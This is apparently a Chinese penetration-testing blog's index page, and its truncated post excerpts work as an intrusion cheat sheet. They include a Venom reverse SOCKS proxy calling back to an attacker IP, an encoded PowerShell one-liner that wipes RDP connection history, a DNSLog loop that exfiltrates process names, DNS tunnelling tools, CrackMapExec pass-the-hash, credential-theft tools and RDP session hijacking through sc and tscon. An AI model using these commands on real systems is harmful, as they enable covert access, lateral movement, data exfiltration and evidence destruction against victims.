利用venom反向socks代理
2022年01月05日 No comment目标边界: 12.12.12.12 agent.exe ‐rhost 198.118.119.118 ‐rport 9999
攻击机: 198.118.119.118 ./admin_linux_x86 ‐lport 99990x01 攻击机监听./admin_linux_x86 ‐lport 99990x2 靶机反向连接agent.e
阅读全文 »
一条命令清除mstsc记录
2021年12月31日 No commentPowershell -enc RwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAgAEMAbABpAGUAbgB0ACIAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUgBlAG0AbwB2AGUALQBJAHQA
阅读全文 »
利用dnslog探测目标进程
2021年12月30日 No comment常用于mssql高权限注入目标主机不岀网利用cmdshell for循环实现for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.xxxx.dnslog.cn >nul用powershell&nb
阅读全文 »
DNS隧道工具
2021年12月24日 No commentiodine https://github.com/yarrick/iodine dnscat2 Type:dns解析类型 A CNAME MX TXT 分为直链模式和中继模式 gem install ecdsa gem install salsa20 gem install sha3 gem install trollop https://rubygems.org/gems
阅读全文 »
windows自带的PSR实现监控桌面
2021年12月23日 No commentpsr.exe /start /gui 0 /output C:\temp\capture.zip 开始录制
psr /stop 停止录制输出的文件是 mht 直接ie打开
阅读全文 »
Crackmapexec
2021年12月21日 No commentkali下进行安装apt-get install crackmapexecIP:可以是单个ip或者ip段-u:指定用户-H:指定NTLM Hash-d:指定域-x:执行系统命令crackmapexec smb 192.168.30.128 -u administrator -H f1de694efa543bb780da59c049541ea3 -d workgroup.cool -x&n
阅读全文 »
Windows域信息收集提权命令
2021年12月20日 No comment获取Windows 其他信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar 查看WinRAR压缩文件等缓存文件打开方式:WIN+R -> %UserProfile%\Recent
C:\Users\Administrator\Recent //默认位置
dir %APPDATA%\Microsoft\Windows\Recent
dir
阅读全文 »
内网抓取密码
2021年12月20日 No comment内网抓取密码https://github.com/QAX-A-Team/BrowserGhost
阅读全文 »
Windows提权辅助工具Windows-Exploit-Suggester
2019年08月14日 No comment安装 python 3.3.3安装xlrd库 https://pypi.org/project/xlrd/https://www.python.org/ftp/python/3.3.3/python-3.3.3.amd64.msihttps://www.python.org/ftp/python/3.3.3/python-3.3.
阅读全文 »
RDP劫持会话
2019年07月16日 No commentRDP劫持会话sc create sesshijack binpath="cmd.exe /k tscon 1 /dest:rdp-tcp#46"1为要劫持的会话ID dest为 sessionname net start sesshijack参考链接https://www.youtube.com/watch?v=OgsoIoWmhWw
阅读全文 »